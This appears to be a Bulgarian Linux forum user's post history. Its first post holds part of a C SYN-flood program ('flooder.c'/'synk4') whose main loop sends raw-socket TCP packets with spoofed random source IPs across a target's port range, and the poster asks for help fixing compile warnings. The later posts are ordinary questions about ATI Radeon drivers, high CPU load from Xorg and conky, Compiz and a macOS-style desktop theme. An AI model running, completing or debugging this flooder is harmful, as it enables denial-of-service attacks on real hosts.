  them = getaddr(argv[2]);
  lowport  = atoi(argv[3]);
  highport = atoi(argv[4]);

  if(lowport < 1 || 65535 < lowport || highport < 1 || 65535 < highport){
    fprintf(stderr, "Port is 1 - 65535.\n");
    return 1;
  }

  diff = (highport - lowport);
  if(diff < 1){
    fprintf(stderr, "High port must be greater than Low port.\n");
    return 1;
  }

  init_signals();

  /* "sock" is global var */
  sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if(sock < 0){
    fprintf(stderr, "socket (raw)\n");
    return 1;
  }

  printf("\nCopyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 2004\n"
    "The Regents of the University of California. All Rights Reserved.\n");

  alarm(1);
  packetcnt = 0; /* "packetcnt" is global var */
  for(i=1; i < 0x7FFFFFFF; i++){
    srandom(time(0) + i);
    srcport = getrandom(1024, 65535);
    for(j=lowport; j <= highport; j++){
      if(urip == 1){
   sprintf(junk, "%i.%i.%i.%i",
      getrandom(0, 255),
      getrandom(0, 255),
      getrandom(0, 255),
      getrandom(0, 255));
   me_fake = getaddr(junk);
      }
      spoof_open(me_fake, them, srcport, j);
      packetcnt++;
    }
  }
  printf("0x7FFFFFFF or more packets were sended.\n");
  return 0;
}


Това е грешката '<img'>

Примерен код
beastfx@Deyanov:~$ sudo cc -o synk4 flooder.c
flooder.c: In function ‘send_tcp_segment’:
flooder.c:113: warning: incompatible implicit declaration of built-in function ‘memcpy’
flooder.c:116: warning: incompatible implicit declaration of built-in function ‘memset’


Моля някой който е по-наясно да помогне.
6  Linux секция за начинаещи / Настройка на програми / Howto: Линукс - macos x трансформация. -: Jul 29, 2008, 05:49
Ако искате да превърнете своя работен плот, като този на MacOS X кликнете ТУК.Статията е изчерпаема и подробна.Ако следвате точно инструкциите ще получите този резултат:

http://img360.imageshack.us/img360/1315/effectthumbpt6.jpg7  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Processor overload -: Jul 20, 2008, 00:19
Открих кое точно в конки товари нещата и това е XFT което е нужно за фонтовете.Някакви идей какво да правя..
8  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Processor overload -: Jul 18, 2008, 14:28
Картата на това PC е ATI Radeon 9200SE на която не работи fglrx и ползвам драйвърите по default
9  Linux секция за напреднали / Хардуерни и софтуерни проблеми / Processor overload -: Jul 17, 2008, 23:57
Инсталирах Убунту и процесора е на 100% само от xorg и conky.Процесора ми е Интелски 2.4ghz и не мисля, че е нормално.Някой знае ли как да отстраня проблема или да разбера каква е причината да се товари така процесора
10  Linux секция за начинаещи / Настройка на хардуер / X server unable to detect -: Jul 17, 2008, 14:47
Знам, че драйвърите са стари проблема е, че преди съм инсталирал fglrx и работеше добре видеото, сега изобщо не иска да ги инсталира.
11  Linux секция за начинаещи / Настройка на хардуер / X server unable to detect -: Jul 17, 2008, 14:06
Когато отворя файла за инсталация на мойте драйвери за видео карта (fglrx) ATI Radeon 9200SE ми изкарва някаква грешка X-server:unable to detect.
Драйвърите по default  подържат добра резолция но бавят движението при скрол на страници и т.н тоест не са наред нещата.Какви драйвъри да използвам за да работи нормално и има ли начин на 9200SE да се пусне 3D.Мерси предварително
Линукс Убунту 8.04 Desktop
12  Linux секция за начинаещи / Настройка на програми / Проблем с compiz и xgl -: Dec 24, 2007, 11:44
Пробвах да сложа XGL и Compiz но не успях.

Със Лаптоп Prestigion Nobile 156 (но с 2ГБ рам) дистрибуцията ми е OpenSuse

Ако може да ми дадете точните пакети и кое да променя ще съм ви много благодарен.
Страници: [1]